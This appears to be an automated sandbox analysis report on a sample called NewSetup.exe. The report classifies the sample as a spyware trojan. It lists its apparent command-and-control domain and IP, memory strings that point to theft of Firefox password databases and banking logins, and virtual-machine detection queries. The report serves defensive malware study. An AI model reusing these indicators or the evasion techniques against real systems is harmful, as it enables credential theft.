              Source: NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/e&TI
              Source: NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/gT
              Source: NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/l
              Source: NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/l8T
              Source: NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/lJTm
              Source: NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/m
              Source: NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/nT
              Source: NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/p
              Source: NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/s
              Source: NewSetup.exe, NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243462732.0000000003434000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273866612.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243225277.0000000003431000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click:443/api
              Source: NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243462732.0000000003434000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273866612.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243225277.0000000003431000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click:443/apiault-release/key4.dbPK
              Source: NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click:443/apiicrosoft
              Source: NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: NewSetup.exe, 00000003.00000002.2323001523.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292481994.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_
              Source: NewSetup.exe, 00000003.00000003.2240282371.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: NewSetup.exeString found in binary or memory: https://www.entrust.net/rpa0
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: NewSetup.exe, 00000003.00000003.2217185269.0000000005A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: NewSetup.exe, 00000003.00000003.2217185269.0000000005A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49732 version: TLS 1.2
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_002110000_2_00211000
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0021F5550_2_0021F555
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_002377920_2_00237792
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00235C5E0_2_00235C5E
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00229CC00_2_00229CC0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00223FB20_2_00223FB2
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_002110003_2_00211000
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_0021F5553_2_0021F555
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_002377923_2_00237792
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00235C5E3_2_00235C5E
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00229CC03_2_00229CC0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00223FB23_2_00223FB2
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_004380003_2_00438000
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_004269E03_2_004269E0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_0040E1FA3_2_0040E1FA
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_0043F1A03_2_0043F1A0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_004219B03_2_004219B0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: String function: 00220730 appears 38 times
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: String function: 002280F8 appears 42 times
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: String function: 0022CFD6 appears 40 times
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: String function: 0021FAE4 appears 34 times
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: String function: 0021FA60 appears 100 times
              Source: NewSetup.exeStatic PE information: invalid certificate
              Source: NewSetup.exe, 00000000.00000000.2111803141.000000000029E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs NewSetup.exe
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs NewSetup.exe
              Source: NewSetup.exe, 00000003.00000000.2120867204.000000000029E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs NewSetup.exe
              Source: NewSetup.exe, 00000003.00000003.2121411665.0000000003245000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs NewSetup.exe
              Source: NewSetup.exeBinary or memory string: OriginalFilenameMuiUnattend.exej% vs NewSetup.exe
              Source: NewSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: NewSetup.exeStatic PE information: Section: .bss ZLIB complexity 1.0003282289933444
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@1/1
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
              Source: NewSetup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\NewSetup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: NewSetup.exe, 00000003.00000003.2168549065.0000000005A0A000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168287632.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2193498627.0000000005A1C000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2193403881.0000000005A29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: NewSetup.exeReversingLabs: Detection: 36%
              Source: C:\Users\user\Desktop\NewSetup.exeFile read: C:\Users\user\Desktop\NewSetup.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\NewSetup.exe "C:\Users\user\Desktop\NewSetup.exe"
              Source: C:\Users\user\Desktop\NewSetup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\NewSetup.exeProcess created: C:\Users\user\Desktop\NewSetup.exe "C:\Users\user\Desktop\NewSetup.exe"
              Source: C:\Users\user\Desktop\NewSetup.exeProcess created: C:\Users\user\Desktop\NewSetup.exe "C:\Users\user\Desktop\NewSetup.exe"Jump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: NewSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: NewSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: NewSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: NewSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: NewSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: NewSetup.exeStatic PE information: real checksum: 0x8d404 should be: 0x96cf3
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0021FB83 push ecx; ret 0_2_0021FB96
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_033E6E78 push ds; iretd 3_3_033E6E7B
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_033E6E78 push ds; iretd 3_3_033E6E7B
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_034383DA pushad ; retf 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_033E6E78 push ds; iretd 3_3_033E6E7B
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_3_033E6E78 push ds; iretd 3_3_033E6E7B
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_0021FB83 push ecx; ret 3_2_0021FB96
              Source: C:\Users\user\Desktop\NewSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\NewSetup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\NewSetup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-20518
              Source: C:\Users\user\Desktop\NewSetup.exeAPI coverage: 2.1 %
              Source: C:\Users\user\Desktop\NewSetup.exe TID: 5100Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exe TID: 5100Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00231F38 FindFirstFileExW,0_2_00231F38
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00231FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00231FE9
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00231F38 FindFirstFileExW,3_2_00231F38
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00231FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00231FE9
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: NewSetup.exe, NewSetup.exe, 00000003.00000002.2322348607.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167294440.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2274012415.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243516642.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275542472.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322348607.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243277695.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2318084383.00000000033E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: NewSetup.exe, 00000003.00000003.2167294440.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2274012415.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243516642.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275542472.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322348607.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243277695.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2318084383.00000000033E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]
